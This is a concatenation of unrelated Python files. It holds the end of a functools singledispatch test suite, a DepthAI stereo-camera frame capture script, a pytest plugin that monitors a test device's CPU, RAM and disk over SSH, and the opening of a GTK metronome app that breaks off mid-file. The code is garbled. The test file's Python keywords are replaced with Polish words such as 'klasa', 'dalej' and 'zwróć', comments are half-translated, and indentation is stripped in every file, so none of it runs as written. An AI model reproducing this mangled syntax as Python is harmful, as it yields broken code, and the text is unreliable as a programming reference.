g.register(c.Sized, lambda obj: "sized")
self.assertEqual(g(d), "sized")
self.assertEqual(g(l), "sized")
self.assertEqual(g(s), "sized")
self.assertEqual(g(f), "sized")
self.assertEqual(g(t), "sized")
g.register(c.MutableMapping, lambda obj: "mutablemapping")
self.assertEqual(g(d), "mutablemapping")
self.assertEqual(g(l), "sized")
self.assertEqual(g(s), "sized")
self.assertEqual(g(f), "sized")
self.assertEqual(g(t), "sized")
g.register(c.ChainMap, lambda obj: "chainmap")
self.assertEqual(g(d), "mutablemapping") # irrelevant ABCs registered
self.assertEqual(g(l), "sized")
self.assertEqual(g(s), "sized")
self.assertEqual(g(f), "sized")
self.assertEqual(g(t), "sized")
g.register(c.MutableSequence, lambda obj: "mutablesequence")
self.assertEqual(g(d), "mutablemapping")
self.assertEqual(g(l), "mutablesequence")
self.assertEqual(g(s), "sized")
self.assertEqual(g(f), "sized")
self.assertEqual(g(t), "sized")
g.register(c.MutableSet, lambda obj: "mutableset")
self.assertEqual(g(d), "mutablemapping")
self.assertEqual(g(l), "mutablesequence")
self.assertEqual(g(s), "mutableset")
self.assertEqual(g(f), "sized")
self.assertEqual(g(t), "sized")
g.register(c.Mapping, lambda obj: "mapping")
self.assertEqual(g(d), "mutablemapping") # nie specific enough
self.assertEqual(g(l), "mutablesequence")
self.assertEqual(g(s), "mutableset")
self.assertEqual(g(f), "sized")
self.assertEqual(g(t), "sized")
g.register(c.Sequence, lambda obj: "sequence")
self.assertEqual(g(d), "mutablemapping")
self.assertEqual(g(l), "mutablesequence")
self.assertEqual(g(s), "mutableset")
self.assertEqual(g(f), "sized")
self.assertEqual(g(t), "sequence")
g.register(c.Set, lambda obj: "set")
self.assertEqual(g(d), "mutablemapping")
self.assertEqual(g(l), "mutablesequence")
self.assertEqual(g(s), "mutableset")
self.assertEqual(g(f), "set")
self.assertEqual(g(t), "sequence")
g.register(dict, lambda obj: "dict")
self.assertEqual(g(d), "dict")
self.assertEqual(g(l), "mutablesequence")
self.assertEqual(g(s), "mutableset")
self.assertEqual(g(f), "set")
self.assertEqual(g(t), "sequence")
g.register(list, lambda obj: "list")
self.assertEqual(g(d), "dict")
self.assertEqual(g(l), "list")
self.assertEqual(g(s), "mutableset")
self.assertEqual(g(f), "set")
self.assertEqual(g(t), "sequence")
g.register(set, lambda obj: "concrete-set")
self.assertEqual(g(d), "dict")
self.assertEqual(g(l), "list")
self.assertEqual(g(s), "concrete-set")
self.assertEqual(g(f), "set")
self.assertEqual(g(t), "sequence")
g.register(frozenset, lambda obj: "frozen-set")
self.assertEqual(g(d), "dict")
self.assertEqual(g(l), "list")
self.assertEqual(g(s), "concrete-set")
self.assertEqual(g(f), "frozen-set")
self.assertEqual(g(t), "sequence")
g.register(tuple, lambda obj: "tuple")
self.assertEqual(g(d), "dict")
self.assertEqual(g(l), "list")
self.assertEqual(g(s), "concrete-set")
self.assertEqual(g(f), "frozen-set")
self.assertEqual(g(t), "tuple")
def test_c3_abc(self):
c = collections
mro = functools._c3_mro
klasa A(object):
dalej
klasa B(A):
def __len__(self):
zwróć 0 # implies Sized
@c.Container.register
klasa C(object):
dalej
klasa D(object):
dalej # unrelated
klasa X(D, C, B):
def __call__(self):
dalej # implies Callable
expected = [X, c.Callable, D, C, c.Container, B, c.Sized, A, object]
dla abcs w permutations([c.Sized, c.Callable, c.Container]):
self.assertEqual(mro(X, abcs=abcs), expected)
# unrelated ABCs don't appear w the resulting MRO
many_abcs = [c.Mapping, c.Sized, c.Callable, c.Container, c.Iterable]
self.assertEqual(mro(X, abcs=many_abcs), expected)
def test_mro_conflicts(self):
c = collections
@functools.singledispatch
def g(arg):
zwróć "base"
klasa O(c.Sized):
def __len__(self):
zwróć 0
o = O()
self.assertEqual(g(o), "base")
g.register(c.Iterable, lambda arg: "iterable")
g.register(c.Container, lambda arg: "container")
g.register(c.Sized, lambda arg: "sized")
g.register(c.Set, lambda arg: "set")
self.assertEqual(g(o), "sized")
c.Iterable.register(O)
self.assertEqual(g(o), "sized") # because it's explicitly w __mro__
c.Container.register(O)
self.assertEqual(g(o), "sized") # see above: Sized jest w __mro__
c.Set.register(O)
self.assertEqual(g(o), "set") # because c.Set jest a subclass of
# c.Sized oraz c.Container
klasa P:
dalej
p = P()
self.assertEqual(g(p), "base")
c.Iterable.register(P)
self.assertEqual(g(p), "iterable")
c.Container.register(P)
przy self.assertRaises(RuntimeError) jako re_one:
g(p)
self.assertIn(
str(re_one.exception),
(("Ambiguous dispatch: <class 'collections.abc.Container'> "
"or <class 'collections.abc.Iterable'>"),
("Ambiguous dispatch: <class 'collections.abc.Iterable'> "
"or <class 'collections.abc.Container'>")),
)
klasa Q(c.Sized):
def __len__(self):
zwróć 0
q = Q()
self.assertEqual(g(q), "sized")
c.Iterable.register(Q)
self.assertEqual(g(q), "sized") # because it's explicitly w __mro__
c.Set.register(Q)
self.assertEqual(g(q), "set") # because c.Set jest a subclass of
# c.Sized oraz c.Iterable
@functools.singledispatch
def h(arg):
zwróć "base"
@h.register(c.Sized)
def _(arg):
zwróć "sized"
@h.register(c.Container)
def _(arg):
zwróć "container"
# Even though Sized oraz Container are explicit bases of MutableMapping,
# this ABC jest implicitly registered on defaultdict which makes all of
# MutableMapping's bases implicit jako well z defaultdict's
# perspective.
przy self.assertRaises(RuntimeError) jako re_two:
h(c.defaultdict(lambda: 0))
self.assertIn(
str(re_two.exception),
(("Ambiguous dispatch: <class 'collections.abc.Container'> "
"or <class 'collections.abc.Sized'>"),
("Ambiguous dispatch: <class 'collections.abc.Sized'> "
"or <class 'collections.abc.Container'>")),
)
klasa R(c.defaultdict):
dalej
c.MutableSequence.register(R)
@functools.singledispatch
def i(arg):
zwróć "base"
@i.register(c.MutableMapping)
def _(arg):
zwróć "mapping"
@i.register(c.MutableSequence)
def _(arg):
zwróć "sequence"
r = R()
self.assertEqual(i(r), "sequence")
klasa S:
dalej
klasa T(S, c.Sized):
def __len__(self):
zwróć 0
t = T()
self.assertEqual(h(t), "sized")
c.Container.register(T)
self.assertEqual(h(t), "sized") # because it's explicitly w the MRO
klasa U:
def __len__(self):
zwróć 0
u = U()
self.assertEqual(h(u), "sized") # implicit Sized subclass inferred
# z the existence of __len__()
c.Container.register(U)
# There jest no preference dla registered versus inferred ABCs.
przy self.assertRaises(RuntimeError) jako re_three:
h(u)
self.assertIn(
str(re_three.exception),
(("Ambiguous dispatch: <class 'collections.abc.Container'> "
"or <class 'collections.abc.Sized'>"),
("Ambiguous dispatch: <class 'collections.abc.Sized'> "
"or <class 'collections.abc.Container'>")),
)
klasa V(c.Sized, S):
def __len__(self):
zwróć 0
@functools.singledispatch
def j(arg):
zwróć "base"
@j.register(S)
def _(arg):
zwróć "s"
@j.register(c.Container)
def _(arg):
zwróć "container"
v = V()
self.assertEqual(j(v), "s")
c.Container.register(V)
self.assertEqual(j(v), "container") # because it ends up right after
# Sized w the MRO
def test_cache_invalidation(self):
z collections zaimportuj UserDict
klasa TracingDict(UserDict):
def __init__(self, *args, **kwargs):
super(TracingDict, self).__init__(*args, **kwargs)
self.set_ops = []
self.get_ops = []
def __getitem__(self, key):
result = self.data[key]
self.get_ops.append(key)
zwróć result
def __setitem__(self, key, value):
self.set_ops.append(key)
self.data[key] = value
def clear(self):
self.data.clear()
_orig_wkd = functools.WeakKeyDictionary
td = TracingDict()
functools.WeakKeyDictionary = lambda: td
c = collections
@functools.singledispatch
def g(arg):
zwróć "base"
d = {}
l = []
self.assertEqual(len(td), 0)
self.assertEqual(g(d), "base")
self.assertEqual(len(td), 1)
self.assertEqual(td.get_ops, [])
self.assertEqual(td.set_ops, [dict])
self.assertEqual(td.data[dict], g.registry[object])
self.assertEqual(g(l), "base")
self.assertEqual(len(td), 2)
self.assertEqual(td.get_ops, [])
self.assertEqual(td.set_ops, [dict, list])
self.assertEqual(td.data[dict], g.registry[object])
self.assertEqual(td.data[list], g.registry[object])
self.assertEqual(td.data[dict], td.data[list])
self.assertEqual(g(l), "base")
self.assertEqual(g(d), "base")
self.assertEqual(td.get_ops, [list, dict])
self.assertEqual(td.set_ops, [dict, list])
g.register(list, lambda arg: "list")
self.assertEqual(td.get_ops, [list, dict])
self.assertEqual(len(td), 0)
self.assertEqual(g(d), "base")
self.assertEqual(len(td), 1)
self.assertEqual(td.get_ops, [list, dict])
self.assertEqual(td.set_ops, [dict, list, dict])
self.assertEqual(td.data[dict],
functools._find_impl(dict, g.registry))
self.assertEqual(g(l), "list")
self.assertEqual(len(td), 2)
self.assertEqual(td.get_ops, [list, dict])
self.assertEqual(td.set_ops, [dict, list, dict, list])
self.assertEqual(td.data[list],
functools._find_impl(list, g.registry))
klasa X:
dalej
c.MutableMapping.register(X) # Will nie invalidate the cache,
# nie using ABCs yet.
self.assertEqual(g(d), "base")
self.assertEqual(g(l), "list")
self.assertEqual(td.get_ops, [list, dict, dict, list])
self.assertEqual(td.set_ops, [dict, list, dict, list])
g.register(c.Sized, lambda arg: "sized")
self.assertEqual(len(td), 0)
self.assertEqual(g(d), "sized")
self.assertEqual(len(td), 1)
self.assertEqual(td.get_ops, [list, dict, dict, list])
self.assertEqual(td.set_ops, [dict, list, dict, list, dict])
self.assertEqual(g(l), "list")
self.assertEqual(len(td), 2)
self.assertEqual(td.get_ops, [list, dict, dict, list])
self.assertEqual(td.set_ops, [dict, list, dict, list, dict, list])
self.assertEqual(g(l), "list")
self.assertEqual(g(d), "sized")
self.assertEqual(td.get_ops, [list, dict, dict, list, list, dict])
self.assertEqual(td.set_ops, [dict, list, dict, list, dict, list])
g.dispatch(list)
g.dispatch(dict)
self.assertEqual(td.get_ops, [list, dict, dict, list, list, dict,
list, dict])
self.assertEqual(td.set_ops, [dict, list, dict, list, dict, list])
c.MutableSet.register(X) # Will invalidate the cache.
self.assertEqual(len(td), 2) # Stale cache.
self.assertEqual(g(l), "list")
self.assertEqual(len(td), 1)
g.register(c.MutableMapping, lambda arg: "mutablemapping")
self.assertEqual(len(td), 0)
self.assertEqual(g(d), "mutablemapping")
self.assertEqual(len(td), 1)
self.assertEqual(g(l), "list")
self.assertEqual(len(td), 2)
g.register(dict, lambda arg: "dict")
self.assertEqual(g(d), "dict")
self.assertEqual(g(l), "list")
g._clear_cache()
self.assertEqual(len(td), 0)
functools.WeakKeyDictionary = _orig_wkd
jeżeli __name__ == '__main__':
unittest.main()
|
main.py
|
#!/usr/bin/env python3
import argparse
from pathlib import Path
from time import monotonic
from uuid import uuid4
from multiprocessing import Process, Queue
import cv2
import depthai as dai
def check_range(min_val, max_val):
def check_fn(value):
ivalue = int(value)
if min_val <= ivalue <= max_val:
return ivalue
else:
raise argparse.ArgumentTypeError(
"{} is an invalid int value, must be in range {}..{}".format(value, min_val, max_val)
)
return check_fn
parser = argparse.ArgumentParser()
parser.add_argument('-t', '--threshold', default=0.3, type=float, help="Maximum difference between packet timestamps to be considered as synced")
parser.add_argument('-p', '--path', default="data", type=str, help="Path where to store the captured data")
parser.add_argument('-d', '--dirty', action='store_true', default=False, help="Allow the destination path not to be empty")
parser.add_argument('-nd', '--no-debug', dest="prod", action='store_true', default=False, help="Do not display debug output")
parser.add_argument('-m', '--time', type=float, default=float("inf"), help="Finish execution after X seconds")
parser.add_argument('-af', '--autofocus', type=str, default=None, help="Set AutoFocus mode of the RGB camera", choices=list(filter(lambda name: name[0].isupper(), vars(dai.CameraControl.AutoFocusMode))))
parser.add_argument('-mf', '--manualfocus', type=check_range(0, 255), help="Set manual focus of the RGB camera [0..255]")
parser.add_argument('-et', '--exposure-time', type=check_range(1, 33000), help="Set manual exposure time of the RGB camera [1..33000]")
parser.add_argument('-ei', '--exposure-iso', type=check_range(100, 1600), help="Set manual exposure ISO of the RGB camera [100..1600]")
args = parser.parse_args()
exposure = [args.exposure_time, args.exposure_iso]
if any(exposure) and not all(exposure):
raise RuntimeError("Both --exposure-time and --exposure-iso needs to be provided")
dest = Path(args.path).resolve().absolute()
dest_count = len(list(dest.glob('*')))
if dest.exists() and dest_count != 0 and not args.dirty:
raise ValueError(f"Path {dest} contains {dest_count} files. Either specify new path or use \"--dirty\" flag to use current one")
dest.mkdir(parents=True, exist_ok=True)
def create_pipeline(depth_enabled=True):
pipeline = dai.Pipeline()
rgb = pipeline.createColorCamera()
rgb.setPreviewSize(300, 300)
rgb.setBoardSocket(dai.CameraBoardSocket.RGB)
rgb.setResolution(dai.ColorCameraProperties.SensorResolution.THE_1080_P)
rgb.setInterleaved(False)
rgb.setColorOrder(dai.ColorCameraProperties.ColorOrder.RGB)
controlIn = pipeline.createXLinkIn()
controlIn.setStreamName('control')
controlIn.out.link(rgb.inputControl)
rgbOut = pipeline.createXLinkOut()
rgbOut.setStreamName("color")
rgb.preview.link(rgbOut.input)
if depth_enabled:
left = pipeline.createMonoCamera()
left.setResolution(dai.MonoCameraProperties.SensorResolution.THE_400_P)
left.setBoardSocket(dai.CameraBoardSocket.LEFT)
right = pipeline.createMonoCamera()
right.setResolution(dai.MonoCameraProperties.SensorResolution.THE_400_P)
right.setBoardSocket(dai.CameraBoardSocket.RIGHT)
depth = pipeline.createStereoDepth()
depth.initialConfig.setConfidenceThreshold(255)
median = dai.StereoDepthProperties.MedianFilter.KERNEL_7x7
depth.initialConfig.setMedianFilter(median)
depth.setLeftRightCheck(False)
depth.setExtendedDisparity(False)
depth.setSubpixel(False)
left.out.link(depth.left)
right.out.link(depth.right)
# Create output
leftOut = pipeline.createXLinkOut()
leftOut.setStreamName("left")
left.out.link(leftOut.input)
rightOut = pipeline.createXLinkOut()
rightOut.setStreamName("right")
right.out.link(rightOut.input)
depthOut = pipeline.createXLinkOut()
depthOut.setStreamName("disparity")
depth.disparity.link(depthOut.input)
return pipeline
# https://stackoverflow.com/a/7859208/5494277
def step_norm(value):
return round(value / args.threshold) * args.threshold
def seq(packet):
return packet.getSequenceNum()
def tst(packet):
return packet.getTimestamp().total_seconds()
# https://stackoverflow.com/a/10995203/5494277
def has_keys(obj, keys):
return all(stream in obj for stream in keys)
class PairingSystem:
seq_streams = ["left", "right", "disparity"]
ts_streams = ["color"]
seq_ts_mapping_stream = "left"
def __init__(self):
self.ts_packets = {}
self.seq_packets = {}
self.last_paired_ts = None
self.last_paired_seq = None
def add_packets(self, packets, stream_name):
if packets is None:
return
if stream_name in self.seq_streams:
for packet in packets:
seq_key = seq(packet)
self.seq_packets[seq_key] = {
**self.seq_packets.get(seq_key, {}),
stream_name: packet
}
elif stream_name in self.ts_streams:
for packet in packets:
ts_key = step_norm(tst(packet))
self.ts_packets[ts_key] = {
**self.ts_packets.get(ts_key, {}),
stream_name: packet
}
def get_pairs(self):
results = []
for key in list(self.seq_packets.keys()):
if has_keys(self.seq_packets[key], self.seq_streams):
ts_key = step_norm(tst(self.seq_packets[key][self.seq_ts_mapping_stream]))
if ts_key in self.ts_packets and has_keys(self.ts_packets[ts_key], self.ts_streams):
results.append({
**self.seq_packets[key],
**self.ts_packets[ts_key]
})
self.last_paired_seq = key
self.last_paired_ts = ts_key
if len(results) > 0:
self.collect_garbage()
return results
def collect_garbage(self):
for key in list(self.seq_packets.keys()):
if key <= self.last_paired_seq:
del self.seq_packets[key]
for key in list(self.ts_packets.keys()):
if key <= self.last_paired_ts:
del self.ts_packets[key]
extract_frame = {
"left": lambda item: item.getCvFrame(),
"right": lambda item: item.getCvFrame(),
"color": lambda item: item.getCvFrame(),
"disparity": lambda item: cv2.applyColorMap(item.getFrame(), cv2.COLORMAP_JET),
}
def store_frames(in_q):
while True:
frames_dict = in_q.get()
if frames_dict is None:
return
frames_path = dest / Path(str(uuid4()))
frames_path.mkdir(parents=False, exist_ok=False)
for stream_name, item in frames_dict.items():
cv2.imwrite(str(frames_path / Path(f"{stream_name}.png")), item)
def main():
frame_q = Queue(50)
store_p = Process(target=store_frames, args=(frame_q, ))
store_p.start()
try:
# Pipeline defined, now the device is connected to
with dai.Device() as device:
cams = device.getConnectedCameras()
depth_enabled = dai.CameraBoardSocket.LEFT in cams and dai.CameraBoardSocket.RIGHT in cams
ps = None
if depth_enabled:
ps = PairingSystem()
else:
PairingSystem.seq_streams = []
device.startPipeline(create_pipeline(depth_enabled))
qControl = device.getInputQueue('control')
ctrl = dai.CameraControl()
if args.autofocus:
ctrl.setAutoFocusMode(getattr(dai.CameraControl.AutoFocusMode, args.autofocus))
if args.manualfocus:
ctrl.setManualFocus(args.manualfocus)
if all(exposure):
ctrl.setManualExposure(*exposure)
qControl.send(ctrl)
start_ts = monotonic()
while True:
for queueName in PairingSystem.seq_streams + PairingSystem.ts_streams:
packets = device.getOutputQueue(queueName).tryGetAll()
if ps is not None:
ps.add_packets(packets, queueName)
elif queueName == "color":
for packet in packets:
frame_q.put({"color": extract_frame[queueName](packet)})
if queueName == "color" and len(packets) > 0 and not args.prod:
cv2.imshow("preview", packets[-1].getCvFrame())
if ps is not None:
pairs = ps.get_pairs()
for pair in pairs:
extracted_pair = {stream_name: extract_frame[stream_name](item) for stream_name, item in pair.items()}
if not args.prod:
for stream_name, item in extracted_pair.items():
cv2.imshow(stream_name, item)
frame_q.put(extracted_pair)
if not args.prod and cv2.waitKey(1) == ord('q'):
break
if monotonic() - start_ts > args.time:
break
finally:
frame_q.put(None)
store_p.join()
if __name__ == "__main__":
main()
|
pytest_dut_monitor.py
|
import pytest
import paramiko
import threading
import logging
import time
import os
import yaml
from collections import OrderedDict
from datetime import datetime
from .errors import HDDThresholdExceeded, RAMThresholdExceeded, CPUThresholdExceeded
logger = logging.getLogger(__name__)
DUT_MONITOR = "/tmp/dut_monitor.py"
DUT_CPU_LOG = "/tmp/cpu.log"
DUT_RAM_LOG = "/tmp/ram.log"
DUT_HDD_LOG = "/tmp/hdd.log"
class DUTMonitorPlugin(object):
"""
Pytest plugin which defines:
- pytest fixtures: 'dut_ssh' and 'dut_monitor'
- handlers to verify that measured CPU, RAM and HDD values during each test item execution
does not exceed defined threshold
"""
def __init__(self, thresholds):
self.thresholds = thresholds
@pytest.fixture(autouse=True, scope="module")
def dut_ssh(self, duthosts, rand_one_dut_hostname, creds):
"""Establish SSH connection with DUT"""
duthost = duthosts[rand_one_dut_hostname]
ssh = DUTMonitorClient(host=duthost.hostname, user=creds["sonicadmin_user"],
password=creds["sonicadmin_password"])
yield ssh
@pytest.fixture(autouse=True, scope="function")
def dut_monitor(self, dut_ssh, localhost, duthosts, rand_one_dut_hostname):
"""
For each test item starts monitoring of hardware resources consumption on the DUT
"""
duthost = duthosts[rand_one_dut_hostname]
dut_thresholds = {}
monitor_exceptions = []
# Start monitoring on DUT
dut_ssh.start()
# Read file with defined thresholds
with open(self.thresholds) as stream:
general_thresholds = yaml.safe_load(stream)
dut_thresholds = general_thresholds["default"]
dut_platform = duthost.facts["platform"]
dut_hwsku = duthost.facts["hwsku"]
if dut_platform in general_thresholds:
dut_thresholds.update(general_thresholds[dut_platform]["default"])
if dut_hwsku in general_thresholds[dut_platform]["hwsku"]:
dut_thresholds.update(general_thresholds[dut_platform]["hwsku"][dut_hwsku])
yield dut_thresholds
# Stop monitoring on DUT
dut_ssh.stop()
# Download log files with CPU, RAM and HDD measurements data
measurements = dut_ssh.get_log_files()
# Verify hardware resources consumption does not exceed defined threshold
if measurements["hdd"]:
try:
self.assert_hhd(hdd_meas=measurements["hdd"], thresholds=dut_thresholds)
except HDDThresholdExceeded as err:
monitor_exceptions.append(err)
if measurements["ram"]:
try:
self.assert_ram(ram_meas=measurements["ram"], thresholds=dut_thresholds)
except RAMThresholdExceeded as err:
monitor_exceptions.append(err)
if measurements["cpu"]:
try:
self.assert_cpu(cpu_meas=measurements["cpu"], thresholds=dut_thresholds)
except CPUThresholdExceeded as err:
monitor_exceptions.append(err)
if monitor_exceptions:
raise Exception("\n".join(item.message for item in monitor_exceptions))
def assert_hhd(self, hdd_meas, thresholds):
"""
Verify that free disk space on the DUT is not overutilized
"""
overused = []
fail_msg = "Used HDD threshold - {}\nHDD overuse:\n".format(thresholds["hdd_used"])
for timestamp, used_hdd in hdd_meas.items():
if used_hdd > thresholds["hdd_used"]:
overused.append((timestamp, used_hdd))
if overused:
raise HDDThresholdExceeded(fail_msg + "\n".join(str(item) for item in overused))
def assert_ram(self, ram_meas, thresholds):
"""
Verify that RAM resources on the DUT are not overutilized
"""
failed = False
peak_overused = []
fail_msg = "\nRAM thresholds: peak - {}; before/after test difference - {}%\n".format(thresholds["ram_peak"],
thresholds["ram_delta"])
for timestamp, used_ram in ram_meas.items():
if used_ram > thresholds["ram_peak"]:
peak_overused.append((timestamp, used_ram))
if peak_overused:
fail_msg = fail_msg + "RAM overuse:\n{}\n".format("\n".join(str(item) for item in peak_overused))
failed = True
# Take first and last RAM measurements
if len(ram_meas) >= 4:
before = sum(ram_meas.values()[0:2]) / 2
after = sum(ram_meas.values()[2:4]) / 2
else:
before = ram_meas.values()[0]
after = ram_meas.values()[-1]
delta = thresholds["ram_delta"] / 100. * before
if after >= before + delta:
fail_msg = fail_msg + "RAM was not restored\nRAM before test {}; RAM after test {}\n".format(before, after)
failed = True
if failed:
raise RAMThresholdExceeded(fail_msg)
def assert_cpu(self, cpu_meas, thresholds):
"""
Verify that CPU resources on the DUT are not overutilized
"""
failed = False
total_overused = []
process_overused = {}
cpu_thresholds = "CPU thresholds: total - {}; per process - {}; average - {}\n".format(thresholds["cpu_total"],
thresholds["cpu_process"],
thresholds["cpu_total_average"])
average_cpu = "\n> Average CPU consumption during test run {}; Threshold - {}\n"
fail_msg = ""
total_sum = 0
t_format = "%Y-%m-%d %H:%M:%S"
def handle_process_measurements(p_name, t_first, t_last, p_average):
"""Compose fail message if process overuse CPU durig 'cpu_measure_duration' interval."""
msg_template = "> Process '{}'\nAverage CPU overuse {} during {} seconds\n{}"
duration = (t_last - t_first).total_seconds()
if duration >= thresholds["cpu_measure_duration"]:
return msg_template.format(process_name,
p_average,
duration,
"{} - {}\n".format(t_first.strftime(t_format),
t_last.strftime(t_format)))
return ""
def handle_total_measurements(overused_list):
"""Compose fail message if CPU utilization exceeds threshold during 'duration' interval."""
fail_msg = ""
start = datetime.strptime(overused_list[0][0], t_format)
end = datetime.strptime(overused_list[-1][0], t_format)
if (end - start).total_seconds() >= thresholds["cpu_measure_duration"]:
fail_msg = "Total CPU overuse during {} seconds.\n{}\n\n".format((end - start).total_seconds(),
"\n".join([str(item) for item in overused_list])
)
del overused_list[0:]
return fail_msg
# Calculate total CPU utilization
for m_id, timestamp in enumerate(cpu_meas):
# Collect total CPU utilization to calculate total average
total_sum += cpu_meas[timestamp]["total"]
if cpu_meas[timestamp]["total"] > thresholds["cpu_total"]:
total_overused.append((timestamp, cpu_meas[timestamp]["total"]))
if m_id == (len(cpu_meas) - 1):
fail_msg += handle_total_measurements(total_overused)
total_overused = []
elif total_overused:
fail_msg += handle_total_measurements(total_overused)
total_overused = []
for process_consumption, process_name in cpu_meas[timestamp]["top_consumer"].items():
if process_consumption >= thresholds["cpu_process"]:
if process_name not in process_overused:
process_overused[process_name] = []
# Collect list of CPU utilization for specific process if CPU utilization exceeds threshold
process_overused[process_name].append((timestamp, process_consumption))
# Handle measurements per process
if process_overused:
for process_name, process_consumption in process_overused.items():
timestamps = []
process_sum = 0
for m_id, m_value in enumerate(process_consumption):
t_stamp = datetime.strptime(m_value[0], t_format)
process_sum += m_value[1]
if not timestamps:
timestamps.append(t_stamp)
continue
if (2 <= (t_stamp - timestamps[-1]).total_seconds() <= 3):
timestamps.append(t_stamp)
if m_id == (len(process_consumption) - 1):
fail_msg += handle_process_measurements(p_name=process_name,
t_first=timestamps[0],
t_last=timestamps[-1],
p_average=process_sum / len(timestamps))
else:
fail_msg += handle_process_measurements(p_name=process_name,
t_first=timestamps[0],
t_last=timestamps[-1],
p_average=process_sum / len(timestamps))
timestamps = []
process_sum = 0
# Calculate average CPU utilization
if (total_sum / len(cpu_meas)) > thresholds["cpu_total_average"]:
fail_msg += average_cpu.format(total_sum / len(cpu_meas), thresholds["cpu_total_average"])
if fail_msg:
raise CPUThresholdExceeded(cpu_thresholds + fail_msg)
class DUTMonitorClient(object):
"""
DUTMonitorClient object establish SSH connection with DUT. Keeps SSH connection with DUT during full test run.
Available features:
- start/stop hardware resources monitoring on DUT
- automatically restart monitoring script on the DUT in case of lose network connectivity (device reboot, etc.)
"""
def __init__(self, host, user, password):
self.running = False
self.user = user
self.password = password
self.host = host
self.init()
self.run_channel = None
self._thread = threading.Thread(name="Connection tracker", target=self._track_connection)
self._thread.setDaemon(True)
self._thread.start()
def _track_connection(self):
"""
@summary: Track network connectivity. Reestablish network connection in case of drop connection
"""
while True:
try:
self.ssh.exec_command("true", timeout=5)
except (paramiko.SSHException, AttributeError):
logger.warning("SSH connection dropped")
logger.debug("Trying to reconnect...")
self.close()
try:
self.init()
except Exception as err:
logger.debug(repr(err))
else:
if self.running:
self.start()
else:
time.sleep(5)
def _upload_to_dut(self):
"""
@summary: Upload 'dut_monitor.py' module to the DUT '/tmp' folder
"""
logger.debug("Uploading file to the DUT...")
with self.ssh.open_sftp() as sftp:
sftp.put(os.path.join(os.path.split(__file__)[0], "dut_monitor.py"), DUT_MONITOR)
def init(self):
"""
@summary: Connect to the DUT via SSH and authenticate to it.
"""
logger.debug("Trying to establish connection ...")
self.ssh = paramiko.SSHClient()
self.ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
self.ssh.connect(self.host, username=self.user, password=self.password, timeout=5)
def close(self):
"""
@summary: Close this SSHClient and its underlying Transport
"""
logger.debug("Close SSH connection with DUT")
self.ssh.close()
def exec_command(self, cmd, timeout=None):
"""
@summary: Execute a command on the DUT and track possible connectivity issues.
A new Channel is opened and the requested command is executed
"""
try:
return self.ssh.exec_command(cmd, timeout=timeout, get_pty=True)
except Exception as err:
logger.warning("Broken connection - {}".format(repr(err)))
logger.warning("Skip command {}".format(cmd))
return (None, None, None)
def start(self):
"""
@summary: Start HW resources monitoring on the DUT.
Write obtained values to the following files on the DUT: DUT_CPU_LOG, DUT_RAM_LOG, DUT_HDD_LOG
"""
self.running = True
self._upload_to_dut()
logger.debug("Start HW resources monitoring on the DUT...")
self.run_channel = self.ssh.get_transport().open_session()
self.run_channel.get_pty()
self.run_channel.settimeout(5)
# Start monitoring on DUT
self.run_channel.exec_command("python {} --start".format(DUT_MONITOR))
# Ensure monitoring started
output = self.run_channel.recv(1024)
if not "Started resources monitoring ..." in output:
raise Exception("Failed to start monitoring on DUT: {}".format(output))
def stop(self):
"""
@summary: Close this SSHClient and its underlying Transport
"""
self.running = False
logger.debug("Stop resources monitoring on the DUT...")
if not self.run_channel.closed:
self.run_channel.close()
def read_yml(self, file_pointer):
"""
@summary: Read yaml file content. Convert it to the ordered data.
@return: OrderedDict with sorted keys by timestamp, or empty dict for empty file.
"""
with file_pointer as fp:
measurements = yaml.safe_load("".join(fp))
if measurements is None:
return {}
# Sort json data to process logs chronologically
keys = measurements.keys()
keys.sort()
key_value_pairs = [(item, measurements[item]) for item in keys]
return OrderedDict(key_value_pairs)
def get_log_files(self):
"""
@summary: Fetch monitoring logs from device, parse, convert to dictionary with sorted order.
@return: Dictionary with keys "cpu", "ram", "hdd", values contains appropriate measurements made on DUT.
"""
logger.debug("Downloading file from the DUT...")
cpu_log_fp = self.ssh.open_sftp().file(DUT_CPU_LOG)
ram_log_fp = self.ssh.open_sftp().file(DUT_RAM_LOG)
hdd_log_fp = self.ssh.open_sftp().file(DUT_HDD_LOG)
cpu_meas = self.read_yml(cpu_log_fp)
ram_meas = self.read_yml(ram_log_fp)
hdd_meas = self.read_yml(hdd_log_fp)
return {"cpu": cpu_meas, "ram": ram_meas, "hdd": hdd_meas}
|
tempo.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# Copyright (C) 2017 gumblex
# This program is free software. It comes without any warranty, to
# the extent permitted by applicable law. You can redistribute it
# and/or modify it under the terms of the Do What The Fuck You Want
# To Public License, Version 2, as published by Sam Hocevar. See
# http://www.wtfpl.net/ for more details.
import os
import io
import time
import threading
import collections
import gi
gi.require_version('Gtk', '3.0')
from gi.repository import Gtk
try:
import pyaudio
import wave
has_pyaudio = True
except ImportError:
has_pyaudio = False
class GridWindow(Gtk.Window):
def __init__(self):
Gtk.Window.__init__(self, title="Tempo")
self.set_border_width(10)
self.set_resizable(False)
grid = Gtk.Grid()
grid.set_row_spacing(6)
grid.set_column_spacing(10)
self.add(grid)
self.label1 = Gtk.Label(label="Measure")
self.label2 = Gtk.Label(label="Tempo×2")
self.label3 = Gtk.Label(label="BPM")
self.label4 = Gtk.Label(label="Metronome")
self.label1.set_halign(Gtk.Align.END)
self.label2.set_halign(Gtk.Align.END)
self.label3.set_halign(Gtk.Align.END)
self.label4.set_halign(Gtk.Align.END)
self.box2 = Gtk.Box()
self.box2.set_halign(Gtk.Align.START)
self.box4 = Gtk.Box()
self.box4.set_halign(Gtk.Align.START)
self.toggle_start = Gtk.ToggleButton(label="Active")
self.toggle_start.connect("toggled", self.on_button_toggled)
self.switch_x2 = Gtk.Switch()
self.switch_x2.set_active(False)
self.switch_x2.connect("notify::active", self.on_switch_activated)
self.adj_spin = Gtk.Adjustment(value=60, lower=30, upper=300, step_increment=1, page_increment=10, page_size=0)
self.spin_bpm = Gtk.SpinButton()
self.spin_bpm.set_adjustment(self.adj_spin)
self.adj_spin.set_value(60)
self.adj_spin.connect("value-changed", self.on_spin_changed)
self.switch_mt = Gtk.Switch()
self.switch_mt.set_active(False)
self.switch_mt.set_sensitive(False)
self.button_beat = Gtk.Button(label="Beat")
self.button_beat.set_sensitive(False)
self.button_beat.connect("clicked", self.on_beat)
grid.attach(self.label1, 0, 0, 1, 1)
grid.attach(self.label2, 0, 1, 1, 1)
grid.attach(self.label3, 0, 2, 1, 1)
grid.attach(self.label4, 0, 3, 1, 1)
